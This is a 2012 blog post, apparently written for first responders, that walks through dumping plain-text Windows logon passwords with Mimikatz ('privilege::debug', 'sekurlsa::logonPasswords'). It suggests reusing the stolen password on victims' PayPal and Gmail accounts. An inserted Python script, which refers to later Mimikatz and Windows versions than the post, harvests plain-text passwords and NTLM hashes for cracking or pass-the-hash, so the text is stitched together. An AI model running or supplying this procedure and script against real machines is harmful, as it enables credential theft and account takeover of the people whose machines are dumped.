Monday, October 1, 2012

Password extraction fun

Extracting passwords, whether remotely or by gaining physical access to a computer, is always an area of interest for my clients. Acquiring the Windows password can be very useful: users tend to assume their OS needs a very strong password, not realising that Windows password hashes are very easy to crack. Most people use no more than about three passwords, or derivatives of those three. The Windows password tends to be the 'strong' one, so trying it against their PayPal, Gmail and similar accounts may well succeed.

Generally the way to grab the password is to dump the LM/NT hashes, either by grabbing the SAM or from a RAM dump, and then use rainbow tables (or a dictionary or brute-force attack) to recover the plain text from them; a hash cannot be decrypted, only matched against candidate passwords. This is not terribly hard but requires some knowledge, and there is always the possibility that the crack does not come through for you.

Somehow I had missed the release of a tool called Mimikatz, written by a chap with an extraordinary ability to find and exploit weaknesses in Microsoft's security (and a penchant for writing everything in French, très bien). If you would like to know how his technique works, take the time out to read his cracking PowerPoint presentation (thankfully not in French!). Thanks to my friend Jon Evans, who mentioned it to me last week.

Mimikatz can do a number of things, but the most useful to me is its claim to extract plain-text user passwords. Guess what: it works!

Here's what to do.

Download Mimikatz

Run the 32-bit or 64-bit version, whichever matches your Windows installation, as administrator (please don't make me explain how you would know which!) and you are presented with a console environment.


Next, enable the debug privilege (SeDebugPrivilege, which is what lets Mimikatz read the memory of the LSASS process) with the command:-
privilege::debug


Next, simply dump the passwords by running:-
sekurlsa::logonPasswords full
Job done!


Username - nickfx
Password - 123

Easy eh!
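The two-command procedure above (privilege::debug, then sekurlsa::logonPasswords) prints one block per logon session and per credential provider, and on a busy machine that is a lot of text to read by eye. As an added example, not code from the post or from Mimikatz, here is a small triage parser that pulls the usable plain-text passwords and NT hashes out of a saved run. The sample output is constructed in the layout printed by Mimikatz 2.x, which differs from the 2012 build the post used; the host, user and session values are made up.

```python
"""Triage parser for 'sekurlsa::logonpasswords' output.  Added example, not from the post."""
import re
from typing import Dict, List, Tuple

NULL = "(null)"

# Constructed sample in the mimikatz 2.x layout.  It stands in for the file you would
# keep for the case by running the post's two commands in one shot:
#   mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > logonpasswords.txt
SAMPLE = """\
Authentication Id : 0 ; 123456 (00000000:0001e240)
Session           : Interactive from 1
User Name         : nickfx
Domain            : WORKSTATION
Logon Server      : WORKSTATION
        msv :
         [00000003] Primary
         * Username   : nickfx
         * Domain     : WORKSTATION
         * NTLM       : 3dbde697d71690a769204beb12283678
        tspkg :
         * Username   : nickfx
         * Domain     : WORKSTATION
         * Password   : 123
        wdigest :
         * Username   : nickfx
         * Domain     : WORKSTATION
         * Password   : 123
        kerberos :
         * Username   : nickfx
         * Domain     : WORKSTATION
         * Password   : (null)
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : Service from 0
User Name         : WORKSTATION$
Domain            : WORKGROUP
Logon Server      : (null)
        msv :
        tspkg :
        wdigest :
         * Username   : WORKSTATION$
         * Domain     : WORKGROUP
         * Password   : (null)
        kerberos :
        ssp :
        credman :
"""

SESSION_RE = re.compile(r"^Authentication Id\s*:\s*(.*?)\s*$")
PROVIDER_RE = re.compile(r"^\s*(msv|tspkg|wdigest|kerberos|ssp|credman)\s*:")
FIELD_RE = re.compile(r"^\s*\*\s*(Username|Domain|Password|NTLM|SHA1)\s*:\s*(.*?)\s*$")


def parse_logonpasswords(text: str) -> List[Dict[str, str]]:
    """One record per provider block that names a user: the logon session it belongs to,
    the provider, and whatever secrets (password, ntlm, sha1) that provider exposed."""
    records: List[Dict[str, str]] = []
    session = ""
    current: Dict[str, str] = {}
    for line in text.splitlines():
        m = SESSION_RE.match(line)
        if m:
            session = m.group(1)
            continue
        m = PROVIDER_RE.match(line)
        if m:
            current = {"session": session, "provider": m.group(1)}
            records.append(current)
            continue
        m = FIELD_RE.match(line)
        if m and current:
            current[m.group(1).lower()] = m.group(2)
    return [r for r in records if "username" in r]


def plaintext_credentials(text: str) -> List[Tuple[str, str, str]]:
    """Unique (domain, user, password) triples; (null) and empty passwords are dropped."""
    found = {
        (r.get("domain", ""), r["username"], r["password"])
        for r in parse_logonpasswords(text)
        if r.get("password") not in (None, "", NULL)
    }
    return sorted(found)


def ntlm_hashes(text: str) -> Dict[Tuple[str, str], str]:
    """NT hashes from the msv provider, keyed by (domain, user); these are what you crack
    (or pass the hash with) when no provider holds the plain text."""
    return {
        (r.get("domain", ""), r["username"]): r["ntlm"].lower()
        for r in parse_logonpasswords(text)
        if r.get("ntlm") not in (None, "", NULL)
    }


if __name__ == "__main__":
    for domain, user, password in plaintext_credentials(SAMPLE):
        print(f"{domain}\\{user} : {password}")
    for (domain, user), ntlm in ntlm_hashes(SAMPLE).items():
        print(f"{domain}\\{user} NTLM {ntlm}")
```

Two caveats worth knowing before relying on this in the field. sekurlsa reads the live LSASS process, so it only returns credentials for logon sessions that LSASS still holds; it is not a substitute for dumping the SAM, and running it changes the state of the machine you are examining. And the plain text comes from the wdigest and tspkg providers: on Windows 8.1 / Server 2012 R2 and later, or on older systems with KB2871997 installed and the WDigest UseLogonCredential registry value set to 0, those providers report (null) and you are back to the NT hash from msv, which is why the parser keeps both.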

This is an extremely useful addition to any first responder toolkit, and I highly recommend having a go for 10 minutes.




3 comments:

Binarybod said...

Thanks for this Nick

By the way, you need a stronger password. Publishing the one you do have in your blog isn't too bright either ;)

Nick Furneaux said...

LOL! Darn it, there was me thinking that 123 would cut the mustard. Ahh I just released it again. Will revert back to the password 'password', bound to fool those pesky hackers!

Matt Hahn said...

Nice easy tool to add to the collection. Thanks